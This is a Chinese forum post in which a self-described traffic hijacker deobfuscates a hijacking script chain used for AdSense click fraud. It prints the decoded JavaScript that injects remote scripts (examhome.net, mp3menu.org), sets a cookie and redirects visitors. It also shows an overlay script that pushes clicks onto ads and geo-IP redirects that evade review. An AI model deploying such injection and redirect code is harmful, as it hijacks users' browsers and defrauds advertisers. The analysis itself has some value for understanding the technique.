一个黑阔高手的ADSENSE EMU操作分享

admin   ·   发表于 2018-9-27   ·   公众号文章


温馨提示

如果你喜欢本文,请分享到朋友圈,想要获得更多信息,请关注我。



来自全球主机交流论坛的一个帖子



话说平时除了看看自己的bbs.affadsense.com论坛,偶尔还会去hostloc上看看。



有那么一个帖子,比较好玩,圈内的朋友都知道,我流量大部分是劫持的,所以,如果有人也是做劫持,那么我就喜欢去研究一下。


既然做了加密,那么让我这个同样喜欢做劫持的老农民来一层一层剥下来?






JS解密

解密比较简单,直接用console.log即可

我们获取到了这样的代码


var somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 50, 46, 50, 46, 50, 46, 50, 46, 50);   var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); }

我们继续把加密的用console.log给解密下即可

最后代码如下:


var somestring = document.createElement('script');

somestring.type = 'text/javascript';

somestring.async = true;

somestring.src = "https://examhome.net/stat.js?v=2.2.2.2.2";

var alls = document.getElementsByTagName('script');

var nt3 = true;

for (var i = alls.length; i--;) {

    if (alls[i].src.indexOf("examhome") > -1) {

        nt3 = false;

    }

}

if (nt3 == true) {

    document.getElementsByTagName("head")[0].appendChild(somestring);

}

我来解释下这段代码的意思

通过document.getElementsByTagName获取tagname是script的元素,然后判断是否已经加载了 https://examhome.net/stat.js?v=2.2.2.2.2 这段JS


如果没有,那么就加载进去!



因为如果加载同样的JS,会引起冲突。所以一个就够啦。


 

继续追入

我们继续跟进https://examhome.net/stat.js?v=2.2.2.2.2  这段代码

继续一样的操作,有没有枯燥?反正我们要耐心的来。


解密结果如下:


然后继续解密并整理。

var simplelement = document.createElement('script'); 

simplelement.type = 'text/javascript'; 

simplelement.src = String.fromCharCode("https://mp3menu.org/mp3.js"); 

simplelement.async = true; 

document.getElementsByTagName("head")[0].appendChild(simplelement);


这里又用到了https://mp3menu.org/mp3.js

这里肯定不是一个MP3那么简单,反正糊弄我,不存在。我们继续解密,解密方式一样,这个没经过什么好的加密,所以为了不显得枯燥,我这里直接给出我的结果啦~~


我很体贴人 有没有~~

没错,我就是这么体贴~

(function() {

if (document.cookie.indexOf("mp3menu=") >= 0) {


} else {

 expiry = new Date();

 expiry.setTime(expiry.getTime()+(10*60*1000*6*8));

 document.cookie = "mp3menu=yes; expires=" + expiry.toGMTString();

 var mp3menu = "https://mp3menu.org/red.php"

 window.location.replace(mp3menu);

 window.location.href = mp3menu;

}

  })();


继续解释,判断是否存在mp3menu的饼干值,


如果存在,不进行任何动作


不存在,那么就植入cookie("mp3menu=yes"),还有过期的时间,并且替换网址跳转到

https://mp3menu.org/red.php   这个中转站。


我们模拟一下浏览器看看什么效果

这里不好复现,只能截图


劫持后打开是这样子




我们浏览器打开对应的跳转后的网站是这样子


这个就是这个Adsense EMU鬼的地方

我们对比以上截图,一个是可以大量提高ADSENSE CTR点击率,一个就比较普通了。很明显,这个ADSENSE玩家是故意这么做,来规避谷歌ADSENSE EMU团队的审查。

此时,我感觉我得召唤出柯南君附体了!!!!


柯南柯南柯南。阿西吧~~~附体!!!!!

柯南柯南柯南。阿西吧~~~附体!!!!!

柯南柯南柯南。阿西吧~~~附体!!!!!


猫腻之处

如何发现这个猫腻呢?我们用国内 国外 不同的IP来模拟,然后打开CHROME的F12功能

这样就可以抓他的跳转记录了


国内IP打开的特点


看图说话吧。

国外IP打开特点



国内跟国外,中间一层跳转的网址是不一样的。


为什么网页的广告不一样呢?

我们对比有广告的,跟没广告的,可以发现一个猫腻


猫腻处在于多了个JS调用

http://fix-mix-news.info/wp-content/plugins/mfaer/MyFeaturedAds.js?ver=1

于是我打开这个网址。


jQuery('.container-ads-total').prepend('<a href="#" onclick="return false;" id="remodal-close" class="remodal-close"></a>');
jQuery('body').append('<style>.remodal-close::after {display: block;font-size: 28px;content: "脳";line-height: 19px;cursor: pointer;color: rgb(62, 83, 104);font-family: Arial, "Helvetica CY", "Nimbus Sans L", sans-serif !important;text-decoration: none;transition: all 0.2s linear 0s;}.overlay-on{overflow: auto;-webkit-overflow-scrolling: touch;position: fixed;top: 0;left: 0;right: 0;bottom: 0;z-index: 10000;text-align: center;opacity: 1;background: rgba(33, 36, 46, 0.95);filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#EE21242E, endColorstr=#EE21242E);zoom: 1;-webkit-transition: opacity 0.2s linear;-moz-transition: opacity 0.2s linear;-o-transition: opacity 0.2s linear;transition: opacity 0.2s linear;}.container-ads-total{      top: -87px; z-index: 99999999999;font-size: 16px;position: relative;display: inline-block;min-height: 100%;padding: 35px;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box; vertical-align: middle;background: #f4f4f4;background-clip: padding-box;color: #182a3c;-webkit-box-shadow: 0px 0px 8px #171a24;box-shadow: 0px 0px 8px #171a24;-webkit-transform: scale(0.95);-moz-transform: scale(0.95);-ms-transform: scale(0.95);-o-transform: scale(0.95);transform: scale(0.95);-webkit-transition: -webkit-transform 0.2s linear;-moz-transition: -moz-transform 0.2s linear;-o-transition: -o-transform 0.2s linear;transition: transform 0.2s linear;}.remodal-close {position: absolute;top: 5px;right: 5px;width: 18px;height: 18px;text-decoration: none;-webkit-border-radius: 50%;-webkit-transition: background 0.2s linear;-moz-transition: background 0.2s linear;-o-transition: background 0.2s linear;transition: background 0.2s linear;}</style><div class="overlay-on" ></div>');



我来解释?

给网页中的class属性为

container-ads-total

的广告添加

<a href="#" onclick="return false;" id="remodal-close" class="remodal-close"></a>

然后并指定

remodal-close

的CSS样式


这个EMU套路大概总结

1  劫持

2  判断JS是否加载,没有加载, 加载指定的JS

3  通过IP判断是否跳转网址


国内IP跟国外IP跳转的网站是不一样的


4  进行广告诱惑点击。


如果已经诱惑过的,则不显示广告。

2 Reply   |  Until 2019-3-4 | 2136 View

大刀
发表于 2018-9-28

666,这篇文章估计又要看N次

评论列表

  • 加载数据中...

编写评论内容

gono
发表于 2019-3-4

不觉明厉,学习!学习!

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content

HYBBS © 2016. All Rights Reserved. 老农民

Powered by HYBBS Version 2.3.2